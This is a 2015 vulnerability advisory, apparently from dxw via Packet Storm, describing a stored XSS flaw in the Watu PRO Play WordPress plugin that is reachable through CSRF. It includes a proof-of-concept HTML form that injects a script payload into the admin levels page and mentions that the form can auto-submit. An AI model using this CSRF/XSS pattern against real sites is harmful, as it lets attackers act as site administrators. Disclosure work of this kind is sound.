Watu PRO Play Cross Site Scripting

Type packetstorm
Reporter Tom Adams
Modified 2015-09-01T00:00:00


Software: Watu PRO Play  
Homepage: http://calendarscripts.info/watupro/modules.html#play  
Advisory report: https://security.dxw.com/advisories/stored-xss-in-watu-pro-play-allows-unauthenticated-attacker-to-do-almost-anything-an-admin-can/  
CVE: Awaiting assignment  
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)  
Stored XSS in Watu PRO Play allows unauthenticated attackers to do almost anything an admin can  
An attacker able to convince an admin to visit a link of their choosing (e.g. via a phishing attack) is able to execute arbitrary JavaScript. This makes use of a CSRF vulnerability (no nonce protection on the levels form)  
Proof of concept  
If a logged-in administrator user clicks the submit button on this form, a JavaScript alert will display on /wp-admin/admin.php?page=watuproplay_levels (in a real attack the form can be made to auto-submit using JavaScript):  
<form action=\"http://localhost/wp-admin/admin.php?page=watuproplay_levels&action=add\" method=\"POST\">  
<input type=\"text\" name=\"name\" value=\"<script>alert(1)</script>\">  
<input type=\"text\" name=\"ok\" value=\"1\">  
<input type=\"submit\">  
Disable the plugin until a new version is released that fixes this bug  
Disclosure policy  
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/  
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.  
This vulnerability will be published if we do not receive a response to this report with 14 days.  
2015-08-11: Discovered  
2015-08-26: Reported to vendor by email  
2015-08-26: Requested CVE  
Discovered by dxw:  
Tom Adams  
Please visit security.dxw.com for more information.